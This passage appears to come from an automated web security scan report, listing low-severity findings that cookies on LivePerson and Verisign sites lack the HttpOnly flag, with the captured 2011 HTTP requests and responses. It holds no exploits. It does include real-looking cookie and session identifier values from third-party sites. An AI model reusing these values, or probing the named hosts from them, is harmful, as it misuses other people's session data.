on%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton...[SNIP]...
10.57. http://sales.liveperson.net/hc/2735064/
Summary
Severity: Information
Confidence: Certain
Host: http://sales.liveperson.net
Path: /hc/2735064/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
HumanClickACTIVE=1315603889280; expires=Sat, 10-Sep-2011 21:31:29 GMT; path=/
HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:29 GMT; path=/hc/2735064; domain=.liveperson.net
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/2735064/?&site=2735064&cmd=mTagKnockPage&lpCallId=570873120101-204310992732&protV=20&lpjson=1&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-norton-estore-us-english%7ClpMTagConfig.db1%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=-5110247826455-1315603884:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315603889280; expires=Sat, 10-Sep-2011 21:31:29 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:29 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:29 GMT; path=/hc/2735064; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29679

lpConnLib.Process({"ResultSet": {"lpCallId":"570873120101-204310992732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n...[SNIP]...
10.58. http://sales.liveperson.net/hc/2735064/
Summary
Severity: Information
Confidence: Certain
Host: http://sales.liveperson.net
Path: /hc/2735064/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
HumanClickKEY=3716944001314187740; path=/hc/2735064
HumanClickACTIVE=1315603882871; expires=Sat, 10-Sep-2011 21:31:22 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/2735064/?&site=2735064&cmd=mTagKnockPage&lpCallId=65178923542-457588254008&protV=20&lpjson=1&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-norton-estore-us-english%7ClpMTagConfig.db1%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064
Set-Cookie: HumanClickACTIVE=1315603882871; expires=Sat, 10-Sep-2011 21:31:22 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:22 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29678

lpConnLib.Process({"ResultSet": {"lpCallId":"65178923542-457588254008","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.ne...[SNIP]...
10.59. http://sales.liveperson.net/hc/71097838/
Summary
Severity: Information
Confidence: Certain
Host: http://sales.liveperson.net
Path: /hc/71097838/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net
HumanClickKEY=298575764909514573; path=/hc/71097838
HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=942795420530-312355306232&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/resources/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=7891132346&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&PV%21unit=store-business&PV%21Section=Shopping%20Resources&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&SV%21ActivityCode=87117&SV%21store-business_ActivityCode=87117&SV%21RequestACallURL=http%3A//www4.symantec.com/Vrt/wl%3Ftu_id%3DeeiX12537391&SV%21store-business_RequestACallURL=http%3A//www4.symantec.com/Vrt/wl%3Ftu_id%3DeeiX12537391&title=Store%20Shopping%20Resources%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20s_pers%3D%2520s_nr%253D1315621903651-New%257C1336357903651%253B%2520event69%253Devent69%257C1336357903652%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/8 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/store/resources/index.jsp?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; HumanClickKEY=298575764909514573; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603875047
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net
Set-Cookie: HumanClickKEY=298575764909514573; path=/hc/71097838
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:16 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"942795420530-312355306232","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton...[SNIP]...
10.60. http://sales.liveperson.net/hc/71097838/
Summary
Severity: Information
Confidence: Certain
Host: http://sales.liveperson.net
Path: /hc/71097838/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
HumanClickKEY=7999207371985552108; path=/hc/71097838
HumanClickACTIVE=1315603614239; expires=Sat, 10-Sep-2011 21:26:54 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=170505760237-674877319251&protV=20&lpjson=1&id=7041138736&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/theme.jsp?themeid=contact-verisign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315578244934
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=7999207371985552108; path=/hc/71097838
Set-Cookie: HumanClickACTIVE=1315603614239; expires=Sat, 10-Sep-2011 21:26:54 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:26:54 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 33062

lpConnLib.Process({"ResultSet": {"lpCallId":"170505760237-674877319251","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n...[SNIP]...
10.61. http://sales.liveperson.net/hc/71097838/
Summary
Severity: Information
Confidence: Certain
Host: http://sales.liveperson.net
Path: /hc/71097838/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
HumanClickACTIVE=1315603619835; expires=Sat, 10-Sep-2011 21:26:59 GMT; path=/
HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=361431335564-444301943760&protV=20&lpjson=1&id=2131228943&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/products/downloads/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6491552338753675901; HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603612650
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315603619835; expires=Sat, 10-Sep-2011 21:26:59 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:26:59 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 33062

lpConnLib.Process({"ResultSet": {"lpCallId":"361431335564-444301943760","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n...[SNIP]...
10.62. https://ssl-certificate-center.verisign.ch/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://ssl-certificate-center.verisign.ch
Path: /process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
10.63. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
Summary
Severity: Information
Confidence: Certain
Host: https://ssl-certificate-center.verisign.ch
Path: /process/retail/production_trial_initial
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
10.64. https://ssl-certificate-center.verisign.com/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://ssl-certificate-center.verisign.com
Path: /process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:43 GMT
Server: Apache
Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
10.65. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/production_trial_initial
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/production_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:44 GMT
Server: Apache
Set-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
10.66. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/trustseal_trial_initial
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trustseal_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:45 GMT
Server: Apache
Set-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
10.67. https://trust-center.verisign.ch/process/retail/console_login
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
10.68. https://trust-center.verisign.ch/process/retail/trust_initial
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/trust_initial
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_initial HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
10.69. https://trust-center.verisign.com/favicon.ico
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/favicon.ico
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:45 GMT
Server: Apache
Set-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4710
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/x-icon

...[SNIP]...
10.70. https://trust-center.verisign.com/process/retail/console_login
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
10.71. https://trust-center.verisign.com/process/retail/help_and_support
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/help_and_support
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
